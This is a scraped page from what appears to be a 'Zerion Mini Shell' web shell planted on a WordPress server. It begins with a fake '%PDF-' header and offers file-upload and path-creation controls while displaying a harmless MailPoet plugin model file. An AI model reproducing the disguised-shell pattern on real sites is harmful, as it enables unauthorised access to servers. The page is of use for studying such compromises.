%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/pn/beta/64801_wp-content/plugins/mailpoet/lib/Models/
Upload File :
Create Path :
Current File : /var/www/pn/beta/64801_wp-content/plugins/mailpoet/lib/Models/NewsletterPost.php

<?php
namespace MailPoet\Models;

if(!defined('ABSPATH')) exit;

class NewsletterPost extends Model {
  public static $_table = MP_NEWSLETTER_POSTS_TABLE;

  static function getNewestNewsletterPost($newsletter_id) {
    return self::where('newsletter_id', $newsletter_id)
      ->orderByDesc('created_at')
      ->findOne();
  }
}

Zerion Mini Shell 1.0